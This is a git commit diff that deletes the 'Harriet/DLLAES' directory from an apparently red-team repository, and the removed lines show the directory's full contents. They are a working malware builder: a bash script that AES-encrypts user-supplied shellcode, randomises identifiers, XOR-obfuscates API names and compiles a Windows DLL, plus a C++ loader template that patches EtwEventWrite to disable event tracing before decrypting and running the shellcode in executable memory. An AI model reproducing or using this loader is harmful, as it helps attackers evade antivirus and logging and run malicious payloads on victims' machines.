
Delete Harriet/DLLAES directory

assume-breach 3 лет назад
Родитель
Сommit
4d2c7d1200

+ 0 - 124
Harriet/DLLAES/DLLAes.sh

@@ -1,124 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-  ___   _____ _____   _____                            _           _  ______ _      _     
- / _ \ |  ___/  ___| |  ___|                          | |         | | |  _  \ |    | |    
-/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| | | | | | |    | |    
-|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` | | | | | |    | |    
-| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| | | |/ /| |____| |____
-\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_| |___/ \_____/\_____/
-                                            __/ | |                                       
-                                           |___/|_|                                       
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read MALWARE
-echo ""
-cp Harriet/DLLAES/xor.py Harriet/DLLAES/Resources/xor.py
-cp Harriet/DLLAES/template.cpp Harriet/DLLAES/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 Harriet/DLLAES/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" Harriet/DLLAES/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/DLLAES/Resources/template.cpp
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-19} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-16} | head -n 1 > shell.txt
-Random4=$(cat shell.txt)
-sed -i "s/Random4/$Random4/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-14} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-4} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-2} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" Harriet/DLLAES/Resources/template.cpp
-
-#VIRTUALALLOC VARIABLE NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" Harriet/DLLAES/Resources/template.cpp
-
-#XOR FUNCTION VARIABLE NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" Harriet/DLLAES/Resources/template.cpp
-
-#XOR KEY VALUE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
-XOR_KEY=$(cat shell.txt)
-sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLAES/Resources/template.cpp
-sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLAES/Resources/xor.py
-
-#XOR KEY VARIABLE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
-XOR_VARIABLE=$(cat shell.txt)
-sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/DLLAES/Resources/template.cpp
-rm shell.txt
-
-#VIRTUALALLOC - XOR String
-echo VirtualAlloc > virt.txt
-python3 Harriet/DLLAES/Resources/xor.py virt.txt > virtalloc.txt
-virt=$(cat virtalloc.txt)
-virt2="${virt::-8}" 
-sed -i "s/VIRALO/$virt2/g" Harriet/DLLAES/Resources/template.cpp 
-rm virt*
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -shared -o $MALWARE Harriet/DLLAES/Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""

+ 0 - 26
Harriet/DLLAES/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

+ 0 - 68
Harriet/DLLAES/Resources/template.cpp


+ 0 - 32
Harriet/DLLAES/Resources/xor.py

@@ -1,32 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with XOR
-#
-# author: reenz0h (twitter: @sektor7net)
-
-import sys
-
-KEY = "YnNMojLDpktrJDj"
-
-def xor(data, key):
-	l = len(key)
-	output_str = ""
-
-	for i in range(len(data)):
-		current = data[i]
-		current_key = key[i%len(key)]
-		output_str += chr(ord(current) ^ ord(current_key))
-	
-	return output_str
-
-def printC(ciphertext):
-	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
-
-try:
-    plaintext = open(sys.argv[1], "r").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = xor(plaintext, KEY)
-
-printC(ciphertext)

+ 0 - 110
Harriet/DLLAES/template.cpp

@@ -1,110 +0,0 @@
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment (lib, "crypt32.lib")
-#pragma comment (lib, "advapi32")
-#include <psapi.h>
-#include <string.h>
-#include <tlhelp32.h>
-
-LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
-
-char XOR_VARIABLE []= "XOR_KEY";
-
-unsigned char Random9 []= VIRALO}; 
-
-
-int Random1(char * different, unsigned int different_len, char * key, size_t keylen) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
-
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
-                return -1;              
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
-        
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, different, &different_len)){
-                return -1;
-        }
-        
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
-        
-        return 0;
-}
-
-
-void RandomA(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
-        int r;
-        r = 0;
-        for (int i = 0; i < tada_len; i++) {
-                if (r == XOR_VARIABLE_len - 1) r = 0;
-
-                tada[i] = tada[i] ^ XOR_VARIABLE[r];
-                r++;
-        }
-}
-
-int main(void) {
-	
-	void * Random6_mem;
-	BOOL Random8;
-	HANDLE th;
-        DWORD oldprotect = 0;
-	
-	
-	char Random2[] = KEYVALUE
-	unsigned char Random3[] = PAYVAL
-	unsigned int Random7_len = sizeof(Random3);
-	
-	int pido = 0;
-        HANDLE hProc = NULL;	
-	
-	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
-        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
-
-        #ifdef _WIN64
-        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
-        #else
-        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
-        #endif  
-
-        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
-	
-	strrev(Random3);
-	FreeConsole();
-	strrev(Random3);
-
-	RandomA((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
-        Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), Random9);
-
-	Random6_mem = Virt_Alloc(0, Random7_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
-	Random1((char *) Random3, Random7_len, Random2, sizeof(Random2));
-		
-
-	RtlMoveMemory(Random6_mem, Random3, Random7_len);
-	
-
-	Random8 = VirtualProtect(Random6_mem, Random7_len, PAGE_EXECUTE_READ, &oldprotect);
-
-	if ( Random8 != 0 ) {
-			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Random6_mem, 0, 0, 0);
-			WaitForSingleObject(th, -1);
-	}
-	
-	return 0;
-}
-	

+ 0 - 32
Harriet/DLLAES/xor.py

@@ -1,32 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with XOR
-#
-# author: reenz0h (twitter: @sektor7net)
-
-import sys
-
-KEY = "XOR_KEY"
-
-def xor(data, key):
-	l = len(key)
-	output_str = ""
-
-	for i in range(len(data)):
-		current = data[i]
-		current_key = key[i%len(key)]
-		output_str += chr(ord(current) ^ ord(current_key))
-	
-	return output_str
-
-def printC(ciphertext):
-	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
-
-try:
-    plaintext = open(sys.argv[1], "r").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = xor(plaintext, KEY)
-
-printC(ciphertext)
